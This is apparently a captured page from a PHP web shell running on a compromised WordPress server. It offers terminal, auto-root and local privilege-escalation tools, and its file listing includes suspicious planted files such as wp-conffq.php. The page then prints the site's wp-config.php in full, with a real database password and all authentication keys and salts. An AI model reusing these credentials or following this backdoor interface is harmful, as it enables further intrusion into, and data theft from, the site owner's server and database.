Linux server14.webhostbd.net 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 103.65.138.38 & Your IP : 216.73.216.183
Domains :
Cant Read [ /etc/named.conf ]
User : shadhinotabd
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
shadhinotabd /
public_html /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
dr-xr-xr-x
2026-02-22 06:33
c39da2
[ DIR ]
dr-xr-xr-x
2026-04-02 07:45
wp-admin
[ DIR ]
drwxr-xr-x
2026-04-06 05:43
wp-content
[ DIR ]
drwxr-xr-x
2026-04-06 02:32
wp-includes
[ DIR ]
drwxr-xr-x
2026-04-06 05:58
.htaccess
649
B
-r--r--r--
2026-04-06 03:34
about.php
0
B
-rw-r--r--
2025-04-10 08:28
aswww.php
0
B
-rw-r--r--
2025-01-15 09:06
error_log
1.05
MB
-rw-r--r--
2026-04-06 05:58
index.php
12.29
KB
-r--r--r--
2026-04-06 03:34
license.txt
19.45
KB
-rw-r--r--
2024-11-14 04:16
readme.html
7.24
KB
-rw-r--r--
2025-02-13 07:16
robots.txt
77
B
-rwxr-xr-x
2024-10-29 06:07
wp-activate.php
7.21
KB
-rw-r--r--
2024-10-29 06:07
wp-admin.zip
84.02
MB
-rw-r--r--
2026-04-04 18:37
wp-blog-header.php
351
B
-rw-r--r--
2020-02-06 06:03
wp-comments-post.php
2.27
KB
-rw-r--r--
2023-09-07 15:11
wp-conffq.php
308.59
KB
-rw-r--r--
2026-04-06 02:27
wp-config-sample.php
3.26
KB
-rw-r--r--
2024-11-14 04:16
wp-config.php
3.17
KB
-rw-r--r--
2026-04-04 18:57
wp-links-opml.php
2.44
KB
-rw-r--r--
2023-09-07 15:11
wp-load.php
3.84
KB
-rw-r--r--
2024-10-29 06:07
wp-login.php
50.16
KB
-rw-r--r--
2024-11-14 04:16
wp-mail.php
8.34
KB
-rw-r--r--
2024-11-14 04:16
wp-settings.php
28.35
KB
-rw-r--r--
2024-11-14 04:16
wp-signup.php
33.58
KB
-rw-r--r--
2023-09-07 15:11
wp-trackback.php
4.98
KB
-rw-r--r--
2024-11-14 04:16
xmlrpc.php
3.17
KB
-rw-r--r--
2024-10-29 06:07
Save
Rename
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'shadhinota_web2' ); /** Database username */ define( 'DB_USER', 'shadhinota_web2' ); /** Database password */ define( 'DB_PASSWORD', 'Dl8p#q8prwp^LHr)' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'j09il7twzb1ej3xdgfeo8v9unikuqueuwzuq4snfvxtrdcrlfy3i0pgd3j4y4j8j' ); define( 'SECURE_AUTH_KEY', 'qtlpjm1ym3ukxdywbwaiqk6tcrxjbktzvvvcofig65giwse2yuworai2hnri6ynx' ); define( 'LOGGED_IN_KEY', 'a3rtlqhigoeov36qcz6lc3tlqdxrwcxuj6cjxjqagatp1itzn4jhuaucvh1rdjxa' ); define( 'NONCE_KEY', 'layhadlsa3trywn8mpvyxr1pgx4qatyf2b2agbf2xvpni3lmsonmhj3wsxlug851' ); define( 'AUTH_SALT', 'fej25bzwtuptb9l7r9kbolne2ozfjcsppujkhajdg1jztymnnwsqhgdrvic3ro7e' ); define( 'SECURE_AUTH_SALT', 'bbuiq73myffun3qsunvuu4hdzzgepikojssimekghdqkpwtjvnruv9sgcmjpndos' ); define( 'LOGGED_IN_SALT', 'vhhddxwosjmvgukenie9uafvnglbry2prcodvmyyfbnbxopbtstqydhvqmkukfnv' ); define( 'NONCE_SALT', 'jdn8djewvewflb2tr4yqvbsasz5otskyg3bopgy6safszd5zs3at95ikeqgxglsk' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wpbw_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; define('DISABLE_WP_CRON', true);